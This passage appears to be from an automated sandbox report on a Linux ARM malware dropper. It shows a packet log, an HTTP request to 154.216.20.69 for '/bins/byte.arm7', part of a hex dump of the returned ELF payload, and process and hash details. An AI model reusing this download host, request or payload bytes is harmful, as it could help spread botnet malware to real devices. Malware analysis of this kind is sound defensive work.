      Oct 26, 2024 19:26:50.684427023 CEST8052716154.216.20.69192.168.2.15
      Oct 26, 2024 19:26:50.684463978 CEST8052716154.216.20.69192.168.2.15
      Oct 26, 2024 19:26:50.684576035 CEST8052716154.216.20.69192.168.2.15
      Oct 26, 2024 19:26:50.684609890 CEST8052716154.216.20.69192.168.2.15
      Oct 26, 2024 19:26:50.684643984 CEST8052716154.216.20.69192.168.2.15
      Oct 26, 2024 19:26:50.685265064 CEST5271680192.168.2.15154.216.20.69
      Oct 26, 2024 19:26:50.701811075 CEST8052716154.216.20.69192.168.2.15
      Oct 26, 2024 19:26:50.702478886 CEST8052716154.216.20.69192.168.2.15
      Oct 26, 2024 19:26:50.704472065 CEST5271680192.168.2.15154.216.20.69
      Oct 26, 2024 19:26:50.927331924 CEST8052716154.216.20.69192.168.2.15
      Oct 26, 2024 19:26:50.927409887 CEST5271680192.168.2.15154.216.20.69
      Oct 26, 2024 19:26:51.048424006 CEST5271680192.168.2.15154.216.20.69
      Oct 26, 2024 19:26:51.054161072 CEST8052716154.216.20.69192.168.2.15
      Oct 26, 2024 19:26:51.054202080 CEST8052716154.216.20.69192.168.2.15
      Oct 26, 2024 19:26:51.054228067 CEST5271680192.168.2.15154.216.20.69
      Oct 26, 2024 19:26:51.054238081 CEST8052716154.216.20.69192.168.2.15
      Oct 26, 2024 19:26:51.054271936 CEST8052716154.216.20.69192.168.2.15
      Oct 26, 2024 19:26:51.054325104 CEST8052716154.216.20.69192.168.2.15
      Oct 26, 2024 19:26:51.054577112 CEST8052716154.216.20.69192.168.2.15
      Oct 26, 2024 19:26:51.054626942 CEST8052716154.216.20.69192.168.2.15
      Oct 26, 2024 19:26:51.054661989 CEST8052716154.216.20.69192.168.2.15
      Oct 26, 2024 19:26:51.054693937 CEST8052716154.216.20.69192.168.2.15
      Oct 26, 2024 19:26:51.054728985 CEST8052716154.216.20.69192.168.2.15
      Oct 26, 2024 19:26:51.055512905 CEST8052716154.216.20.69192.168.2.15
      Oct 26, 2024 19:26:51.055547953 CEST8052716154.216.20.69192.168.2.15
      Oct 26, 2024 19:26:51.055583000 CEST8052716154.216.20.69192.168.2.15
      Oct 26, 2024 19:26:51.055617094 CEST8052716154.216.20.69192.168.2.15
      Oct 26, 2024 19:26:51.055650949 CEST8052716154.216.20.69192.168.2.15
      Oct 26, 2024 19:26:51.055661917 CEST5271680192.168.2.15154.216.20.69
      Oct 26, 2024 19:26:51.096703053 CEST5271680192.168.2.15154.216.20.69
      Oct 26, 2024 19:26:51.319363117 CEST8052716154.216.20.69192.168.2.15
      Oct 26, 2024 19:26:51.319447994 CEST5271680192.168.2.15154.216.20.69
      Oct 26, 2024 19:26:51.539278984 CEST8052716154.216.20.69192.168.2.15
      Oct 26, 2024 19:26:51.539340019 CEST5271680192.168.2.15154.216.20.69
      Oct 26, 2024 19:26:51.730544090 CEST5271680192.168.2.15154.216.20.69
      Oct 26, 2024 19:26:51.736063004 CEST8052716154.216.20.69192.168.2.15
      Oct 26, 2024 19:26:51.736099005 CEST8052716154.216.20.69192.168.2.15
      Oct 26, 2024 19:26:51.736114979 CEST8052716154.216.20.69192.168.2.15
      Oct 26, 2024 19:26:51.736129045 CEST5271680192.168.2.15154.216.20.69
      Oct 26, 2024 19:26:51.736130953 CEST8052716154.216.20.69192.168.2.15
      Oct 26, 2024 19:26:51.736149073 CEST8052716154.216.20.69192.168.2.15
      Oct 26, 2024 19:26:51.736537933 CEST8052716154.216.20.69192.168.2.15
      Oct 26, 2024 19:26:51.736555099 CEST8052716154.216.20.69192.168.2.15
      Oct 26, 2024 19:26:51.736572027 CEST8052716154.216.20.69192.168.2.15
      Oct 26, 2024 19:26:51.736587048 CEST8052716154.216.20.69192.168.2.15
      Oct 26, 2024 19:26:51.736603975 CEST8052716154.216.20.69192.168.2.15
      Oct 26, 2024 19:26:51.737338066 CEST8052716154.216.20.69192.168.2.15
      Oct 26, 2024 19:26:51.737667084 CEST8052716154.216.20.69192.168.2.15
      Oct 26, 2024 19:26:51.737683058 CEST8052716154.216.20.69192.168.2.15
      Oct 26, 2024 19:26:51.737726927 CEST8052716154.216.20.69192.168.2.15
      Oct 26, 2024 19:26:51.737742901 CEST8052716154.216.20.69192.168.2.15
      Oct 26, 2024 19:26:51.737757921 CEST8052716154.216.20.69192.168.2.15
      Oct 26, 2024 19:26:51.737772942 CEST8052716154.216.20.69192.168.2.15
      Oct 26, 2024 19:26:51.738688946 CEST5271680192.168.2.15154.216.20.69
      Oct 26, 2024 19:26:51.959261894 CEST8052716154.216.20.69192.168.2.15
      Oct 26, 2024 19:26:51.959335089 CEST5271680192.168.2.15154.216.20.69
      Oct 26, 2024 19:26:52.183538914 CEST8052716154.216.20.69192.168.2.15
      Oct 26, 2024 19:26:52.183604956 CEST5271680192.168.2.15154.216.20.69
      Oct 26, 2024 19:26:52.242228985 CEST5271680192.168.2.15154.216.20.69
      Oct 26, 2024 19:26:52.247770071 CEST8052716154.216.20.69192.168.2.15
      Oct 26, 2024 19:26:52.247828007 CEST8052716154.216.20.69192.168.2.15
      Oct 26, 2024 19:26:52.247834921 CEST5271680192.168.2.15154.216.20.69
      Oct 26, 2024 19:26:52.248245955 CEST8052716154.216.20.69192.168.2.15
      Oct 26, 2024 19:26:52.248373985 CEST5271680192.168.2.15154.216.20.69
      Oct 26, 2024 19:26:52.248763084 CEST8052716154.216.20.69192.168.2.15
      Oct 26, 2024 19:26:52.249216080 CEST8052716154.216.20.69192.168.2.15
      Oct 26, 2024 19:26:52.249252081 CEST8052716154.216.20.69192.168.2.15
      Oct 26, 2024 19:26:52.250152111 CEST8052716154.216.20.69192.168.2.15
      Oct 26, 2024 19:26:52.250638962 CEST5271680192.168.2.15154.216.20.69
      Oct 26, 2024 19:26:52.250725031 CEST8052716154.216.20.69192.168.2.15
      Oct 26, 2024 19:26:52.251123905 CEST8052716154.216.20.69192.168.2.15
      Oct 26, 2024 19:26:52.251226902 CEST8052716154.216.20.69192.168.2.15
      Oct 26, 2024 19:26:52.252101898 CEST8052716154.216.20.69192.168.2.15
      Oct 26, 2024 19:26:52.252139091 CEST8052716154.216.20.69192.168.2.15
      Oct 26, 2024 19:26:52.252871037 CEST5271680192.168.2.15154.216.20.69
      Oct 26, 2024 19:26:52.253050089 CEST8052716154.216.20.69192.168.2.15
      Oct 26, 2024 19:26:52.253294945 CEST8052716154.216.20.69192.168.2.15
      Oct 26, 2024 19:26:52.253966093 CEST8052716154.216.20.69192.168.2.15
      Oct 26, 2024 19:26:52.254189014 CEST8052716154.216.20.69192.168.2.15
      Oct 26, 2024 19:26:52.255170107 CEST5271680192.168.2.15154.216.20.69
      Oct 26, 2024 19:26:52.255980015 CEST8052716154.216.20.69192.168.2.15
      Oct 26, 2024 19:26:52.256074905 CEST8052716154.216.20.69192.168.2.15
      Oct 26, 2024 19:26:52.257477045 CEST5271680192.168.2.15154.216.20.69
      Oct 26, 2024 19:26:52.258285999 CEST8052716154.216.20.69192.168.2.15
      Oct 26, 2024 19:26:52.258495092 CEST8052716154.216.20.69192.168.2.15
      Oct 26, 2024 19:26:52.259764910 CEST5271680192.168.2.15154.216.20.69
      Oct 26, 2024 19:26:52.479366064 CEST8052716154.216.20.69192.168.2.15
      Oct 26, 2024 19:26:52.479440928 CEST5271680192.168.2.15154.216.20.69
      Oct 26, 2024 19:26:52.695311069 CEST8052716154.216.20.69192.168.2.15
      Oct 26, 2024 19:26:52.695399046 CEST5271680192.168.2.15154.216.20.69
      Oct 26, 2024 19:26:52.814266920 CEST5271680192.168.2.15154.216.20.69
      Oct 26, 2024 19:26:52.820600986 CEST8052716154.216.20.69192.168.2.15
      Oct 26, 2024 19:26:52.820677042 CEST5271680192.168.2.15154.216.20.69
      Oct 26, 2024 19:26:52.820682049 CEST8052716154.216.20.69192.168.2.15
      Oct 26, 2024 19:26:52.820882082 CEST8052716154.216.20.69192.168.2.15
      Oct 26, 2024 19:26:52.820935965 CEST8052716154.216.20.69192.168.2.15
      Oct 26, 2024 19:26:52.821840048 CEST8052716154.216.20.69192.168.2.15
      Oct 26, 2024 19:26:52.821896076 CEST8052716154.216.20.69192.168.2.15
      Oct 26, 2024 19:26:52.821980953 CEST5271680192.168.2.15154.216.20.69
      Oct 26, 2024 19:26:52.822783947 CEST8052716154.216.20.69192.168.2.15
      Oct 26, 2024 19:26:52.822916985 CEST8052716154.216.20.69192.168.2.15
      Oct 26, 2024 19:26:52.823757887 CEST8052716154.216.20.69192.168.2.15
      Oct 26, 2024 19:26:52.823852062 CEST8052716154.216.20.69192.168.2.15
      Oct 26, 2024 19:26:52.824656963 CEST8052716154.216.20.69192.168.2.15
      Oct 26, 2024 19:26:52.826896906 CEST5271680192.168.2.15154.216.20.69
      Oct 26, 2024 19:26:54.962822914 CEST5271680192.168.2.15154.216.20.69
      Oct 26, 2024 19:26:54.968189955 CEST8052716154.216.20.69192.168.2.15
      Session IDSource IPSource PortDestination IPDestination Port
      0192.168.2.1552716154.216.20.6980
      TimestampBytes transferredDirectionData
      Oct 26, 2024 19:26:49.214157104 CEST46OUTGET /bins/byte.arm7 HTTP/1.0
      Data Raw: 00 00
      Data Ascii:
      Oct 26, 2024 19:26:50.077810049 CEST1236INHTTP/1.1 200 OK
      Date: Sat, 26 Oct 2024 17:26:49 GMT
      Server: Apache/2.4.6 (CentOS)
      Last-Modified: Fri, 25 Oct 2024 07:14:52 GMT
      ETag: "278bd-62547e017ab08"
      Accept-Ranges: bytes
      Content-Length: 161981
      Connection: close
      Data Raw: 7f 45 4c 46 01 01 01 00 00 00 00 00 00 00 00 00 02 00 28 00 01 00 00 00 94 81 00 00 34 00 00 00 ec f6 01 00 02 00 00 04 34 00 20 00 05 00 28 00 1d 00 1a 00 01 00 00 70 90 80 01 00 90 00 02 00 90 00 02 00 18 01 00 00 18 01 00 00 04 00 00 00 04 00 00 00 01 00 00 00 00 00 00 00 00 80 00 00 00 80 00 00 a8 81 01 00 a8 81 01 00 05 00 00 00 00 80 00 00 01 00 00 00 a8 81 01 00 a8 81 02 00 a8 81 02 00 6c 0b 00 00 e0 3b 00 00 06 00 00 00 00 80 00 00 07 00 00 00 ac 81 01 00 ac 81 02 00 ac 81 02 00 00 00 00 00 08 00 00 00 04 00 00 00 04 00 00 00 51 e5 74 64 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 07 00 00 00 04 00 00 00 0d c0 a0 e1 f0 df 2d e9 04 b0 4c e2 f0 af 1b e9 00 00 00 00 00 00 00 00 00 00 00 00 10 40 2d e9 2c 40 9f e5 00 30 d4 e5 00 00 53 e3 06 00 00 1a 20 30 9f e5 00 00 53 e3 1c 00 9f 15 0f e0 a0 11 13 ff 2f 11 01 30 a0 e3 00 30 c4 e5 10 40 bd e8 1e ff 2f e1 14 8d 02 00 00 00 00 00 a8 81 02 00 04 e0 2d e5 40 30 9f e5 00 00 53 e3 04 d0 4d e2 38 00 9f 15 38 10 9f 15 0f e0 a0 11 13 ff [TRUNCATED]
      Data Ascii: ELF(44 (pl;Qtd-L@-,@0S 0S/00@/-@0SM88/00S$0S// ---093LP@-@0S0SP@/@G-`p 6p00PPPUG/6p@P7 l4j4l0Q`0 0S0SPU4 $0/04O-QM@PO/!< 4,4T T Y1p0DS:`0pg0G P`FV0@
      Oct 26, 2024 19:26:50.078018904 CEST236INData Raw: 10 8c e5 b0 30 cc e1 05 00 80 e2 18 c0 8c e2 f1 ff ff 1a 00 00 56 e3 3e 00 00 0a 00 50 d4 e5 00 00 55 e3 07 80 47 e2 05 60 a0 01 30 00 00 0a 05 00 a0 e1 08 10 a0 e3 c6 30 00 eb 00 00 58 e3 00 60 a0 e1 33 00 00 0a 01 30 d4 e5 08 00 57 e3 04 30 c0
      Data Ascii: 0V>PUG`00X`30W00.@GX p $ X"0 R00Bp@X000 0
      Oct 26, 2024 19:26:50.078027964 CEST1236INData Raw: 20 9d e5 82 31 a0 e1 05 00 52 e1 03 a0 86 e0 e3 ff ff 1a e1 21 00 eb 00 30 a0 e3 00 30 80 e5 14 10 9d e5 0b 00 a0 e1 09 20 a0 e1 0c 30 9d e5 60 00 8d e8 4b ff ff eb 0c 30 9d e5 00 00 53 e3 03 00 a0 11 64 32 00 1b 00 00 56 e3 8a ff ff 0a 00 00 55
      Data Ascii: 1R!00 0`K0Sd2VU@P@[2UW2~P@-@0S0R^@/PA,@P@-
      Oct 26, 2024 19:26:50.078047037 CEST1236INData Raw: 89 00 00 dc c1 00 00 e4 ba 00 00 30 b3 00 00 7c ab 00 00 6c 9a 00 00 d8 93 00 00 4c 8c 00 00 f0 4f 2d e9 2c d0 4d e2 04 10 8d e5 04 10 a0 e3 02 50 a0 e1 03 60 a0 e1 00 70 a0 e1 5b 2f 00 eb 04 10 a0 e3 00 a0 a0 e1 07 00 a0 e1 57 2f 00 eb 01 48 a0
      Data Ascii: 0|lLO-,MP`p[/W/H@D 0, 0 < 0,X)h0V $000 0)<$
      Oct 26, 2024 19:26:50.078059912 CEST1236INData Raw: 34 83 e1 ff 1c 02 e2 01 34 83 e1 02 3c 83 e1 04 30 86 e5 ce ff ff ea 2c d0 8d e2 f0 4f bd e8 1e ff 2f e1 10 c0 9d e5 00 00 5c e3 0b 00 00 1a 10 40 9d e5 03 00 00 ea 04 01 98 e7 04 11 9a e7 e3 2a 00 eb 01 40 84 e2 04 00 57 e1 05 20 a0 e1 01 39 a0
      Data Ascii: 44<0,O/\@*@W 9@`VA 9*`O-TM@Pp. 080C
      Oct 26, 2024 19:26:50.078073025 CEST1236INData Raw: 3c 04 e2 14 c0 d1 e5 03 24 82 e1 04 2c 82 e1 30 2c 82 e0 ff 08 02 e2 22 3c a0 e1 20 34 83 e1 ff 1c 02 e2 01 34 83 e1 02 3c 83 e1 10 30 85 e5 18 30 9d e5 01 00 73 e3 b3 ff ff 1a 09 11 00 eb 01 48 a0 e3 20 c0 9d e5 01 40 44 e2 04 00 5c e1 0c 00 85
      Data Ascii: <$,0,"< 44<00sH @D\,P0Q40SDV4TO/hO-tM@P,$ 0g
      Oct 26, 2024 19:26:50.078084946 CEST608INData Raw: 70 85 e2 26 60 85 e2 3a 80 85 e2 55 00 00 9a 28 10 9d e5 01 00 71 e3 6a 00 00 0a 01 48 a0 e3 01 40 44 e2 04 00 5b e1 6c 00 00 0a 3c 20 9d e5 04 00 52 e1 73 00 00 0a 40 30 9d e5 04 00 53 e1 75 00 00 0a 4c 40 9d e5 00 00 54 e3 10 30 95 15 10 30 86
      Data Ascii: p&`:U(qjH@D[l< Rs@0SuL@T00whdh` d ` b HQa 00@
      Oct 26, 2024 19:26:50.078092098 CEST1236INData Raw: 00 9d e5 63 32 00 eb 74 d0 8d e2 f0 4f bd e8 1e ff 2f e1 44 10 9d e5 44 20 9d e5 08 10 81 e2 42 20 82 e2 10 10 8d e5 14 20 8d e5 52 ff ff ea 68 b8 02 00 f0 4f 2d e9 01 90 a0 e1 64 d0 4d e2 04 10 a0 e3 02 40 a0 e1 03 50 a0 e1 00 a0 a0 e1 2b 2b 00
      Data Ascii: c2tO/DD B RhO-dM@P++ 080C ( @0 0,80C 08
      Oct 26, 2024 19:26:50.078103065 CEST1236INData Raw: 0a 00 eb 5c 20 9d e5 82 32 a0 e1 10 10 95 e5 82 31 43 e0 09 e0 83 e0 04 10 8e e5 02 10 a0 e3 b6 00 c7 e1 10 c0 a0 e3 b9 10 83 e1 b2 40 ce e1 01 39 a0 e3 05 10 a0 e1 24 00 9d e5 08 20 a0 e1 00 e0 8d e5 04 c0 8d e5 e5 26 00 eb 5c 30 9d e5 01 00 83
      Data Ascii: \ 21C@9$ &\0P\@\0A$,,$<$,0,"< 44 <q0H@D[ 4 ?@0
      Oct 26, 2024 19:26:50.078110933 CEST1236INData Raw: 60 ce e1 01 39 a0 e3 10 c0 a0 e3 05 10 a0 e1 20 20 82 e2 09 00 a0 e1 00 e0 8d e5 04 c0 8d e5 bd 25 00 eb 2c 30 9d e5 01 00 83 e2 08 00 50 e1 2c 00 8d e5 c9 ff ff ba 00 30 a0 e3 00 00 58 e3 2c 30 8d e5 c0 ff ff 0a c3 ff ff ea 10 40 93 e5 d9 0c 00
      Data Ascii: `9 %,0P,0X,0@,0A$,,$<$,0,"< 44<00S\ Q/4O/
      Oct 26, 2024 19:26:50.083679914 CEST1236INData Raw: 30 c3 e3 05 30 83 e3 40 e0 9d e5 00 30 c1 e5 34 00 9d e5 00 00 5e e3 01 00 c1 e5 3c 20 9d e5 40 30 a0 13 b6 30 c1 11 11 30 a0 e3 08 20 c1 e5 09 30 c1 e5 a8 e2 9f e5 00 30 9e e5 50 e0 9d e5 29 20 81 e2 0e 40 82 e0 0c 30 81 e5 5c 20 8d e2 0c 00 92
      Data Ascii: 00@04^< @000 00P) @0\ 0dPX0 (1T lV0.S0 Q


      System Behavior

      Start time (UTC):17:26:48
      Start date (UTC):26/10/2024
      Path:/tmp/dlr.arm7.elf
      Arguments:/tmp/dlr.arm7.elf
      File size:4956856 bytes
      MD5 hash:5ebfcae4fe2471fcc5695c2394773ff1